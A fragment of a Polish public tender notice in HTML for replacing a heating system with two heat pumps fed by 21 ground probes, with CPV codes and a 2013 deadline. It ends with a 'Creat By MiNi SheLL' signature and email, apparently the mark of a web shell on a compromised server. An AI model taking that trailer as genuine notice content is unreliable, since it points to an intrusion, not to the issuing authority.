Projekt obejmuje wymianę istniejącej instalacji centralnego ogrzewania i istniejących grzejników żeliwnych. Nowo wykonana instalacja  centralnego ogrzewania zasilana będzie z  projektowaną kaskadą 2 pomp ciepła  o łącznej mocy 85,6 kW, obiegiem pierwotnym będzie instalacja pomp ciepła z 21 pionowymi sondami gruntowymi o głębokości 100 mb każda. Rozdział na poszczególne odwierty nastąpi z 3 studni polietylenowych z kolektorami wielosekcyjnymi. W ramach remontu wymieniona zostanie instalacja wraz z grzejnikami które zastąpione zostaną grzejnikami płytowymi wyposażonymi w głowice termostatyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.10.00-0, 45.33.22.00-5, 45.12.10.00-1, 45.33.00.00-9, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com